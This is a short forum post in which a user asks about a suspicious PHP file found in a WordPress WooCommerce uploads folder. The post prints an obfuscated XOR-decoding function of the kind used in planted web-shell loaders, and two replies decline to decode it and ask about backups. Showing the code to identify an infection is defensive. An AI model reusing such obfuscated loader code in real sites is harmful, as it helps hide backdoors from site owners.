# I found this code in my wp-content/uploads/woocommerce_uploads/wp-user-new.php

Tags: malware

```
<?php  


 function Gljng($ZOege, $INLWC = '') { $X_6Nm = $ZOege; $v9BZR = ''; for ($hfEHR = 0; $hfEHR < strlen($X_6Nm);) { for ($SsuGo = 0; $SsuGo < strlen($INLWC) && $hfEHR < strlen($X_6Nm); $SsuGo++, $hfEHR++) { $v9BZR .= $X_6Nm[$hfEHR] ^ $INLWC[$SsuGo]; } } return $v9BZR; }
/*UrgfCOEWhkpegJwwzRNoKMyALZowaJwVCvFpQodvNTzGSogNdeJiUvtJnRWIIyCWdTYTWhvomVDBxmJyBMyvXyilKdwnkFCryJkPXuGBFrBQWEgCTMhcVVQiZJRlGhvf*/
```

Comment: Unfortunately, we cannot decode random code for people.

Comment: I hope you have tested your backup system before this. You have backups, right?